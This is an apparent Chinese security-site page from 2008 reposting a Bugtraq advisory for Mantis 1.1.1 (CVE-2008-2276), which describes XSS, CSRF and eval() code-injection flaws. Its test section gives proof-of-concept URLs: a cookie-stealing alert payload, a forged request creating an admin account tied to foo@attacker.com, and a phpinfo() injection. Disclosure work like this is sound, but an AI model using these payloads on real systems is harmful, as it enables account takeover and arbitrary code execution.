·	Mantis多个输入验证漏洞	05-23	·	PHP168 X-Forwarded-For	05-23
·	首页巡警v1.1/1.0 本地提	05-23	·	Firefox安全设置	05-23
·	火眼金睛如何识别系统恶	05-23	·	易联网络为您提供150m美	05-23
·	巧妙查看Windows Server	05-22	·	玩转卡巴斯基的19招，让	05-22
·	建立一个别人不能碰的无	05-21	·	卸诺顿 WinXP丢失IP无法	05-21
·	揭秘灰鸽子运行原理(含手	05-21	·	DIY QQ:想要啥样就改啥样	05-21
·	PCSHARE VIP 2005源代码	05-21	·	NBSI_1.157源代码	05-21
·	刷BIOS到EFI破解，Vista	05-21	·	弘毅网提供100M免费asp空	05-21
·	转移Vista脱机文件减压V	05-20	·	改进BitLocker浅谈Vista	05-20
·	巧妙几招，用好Windows	05-20	·	齐鲁科宇网提供20MB免费	05-20
·	解密网页加密的两个方法	05-19	·	Dedecms getip()的漏洞利	05-19
·	一个弹窗口的流氓软件源	05-19	·	C++ win32 下载者源码	05-19
·	经验谈:Vista高效冲浪，	05-19	·	灵活应用组策略禁用USB	05-19
·	DomainDLX提供100M免费A	05-19	·	MyPhpAdmin 执行攻击者代	05-16

[推荐]Mantis多个输入验证漏洞

荐 ★★★

Mantis多个输入验证漏洞

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2008-5-23 10:10:36

受影响系统：
Mantis mantis 1.1.1
不受影响系统：
Mantis mantis 1.2.0a1
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 29297
CVE(CAN) ID: CVE-2008-2276
Mantis是用PHP脚本语言编写的基于web的漏洞跟踪系统。
Mantis没有正确地验证用户输入，Mantis的return_dynamic_filters.php文件中存在跨站脚本漏洞，manage_user_create.php文件中存在跨站请求伪造漏洞。此外如果用户通过上述漏洞获得了有效的管理帐号的话，由于在 adm_config_.php文件的的第80行的以下语句：
eval( ′$t_ = ′ . $f_ . ′;′ );
这里$f_是在34行定义的：
$f_ = gpc_get_string( ′′ );
$f_参数没有经过任何验证，因此攻击者可以通过执行phpinfo()函数的恶意URL导致执行任意代码。
<*来源：Francesco Ongaro （ascii@ush.it）
链接：http://marc.info/?l=bugtraq&m=121130774617956&w=2
*>
测试方法：
--------------------------------------------------------------------------------
警告
以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
http://www.example.com/mantis/return_dynamic_filters.php?filter_target=<>alert(document.cookie);</>
foo@attacker.com&access_level=90&protected=0&enabled=1" target="_blank">http://www.example.com/mantis/manage_user_create.php?username=foo&realname=aa&password=aa&password_verify=aa&email=foo@attacker.com&access_level=90&protected=0&enabled=1
http://www.example.com/mantis/adm_config_.php?user_id=0&project_id=0&config_option=cache_config&type=0&=0;phpinfo()
建议：
--------------------------------------------------------------------------------
厂商补丁：
Mantis
------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：
http://mantisbt.sourceforge.net/

文章录入：cainiaowang 责任编辑：xinlian

上一篇文章： PHP168 X-Forwarded-For的漏洞利用

下一篇文章：没有了

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

新云CMS Online.asp页面过滤不严	02-26
对网软网上购物系统的漏洞分析	01-09
测试SQL防注入脚本	12-21
Google Xss又出跨站新漏洞	11-06
一次简单的html injection导致的	11-06
风讯、科讯漏洞利用	11-01
Adobe pdf reader URI利用方式浅	10-23
超星阅览器的最新0DAY	10-19
运用SQL Injection做数据库渗透的	09-22
sa-blog 0day	09-22
HTML注入的一些简单想法	09-10
网站登陆接口的攻与防	09-04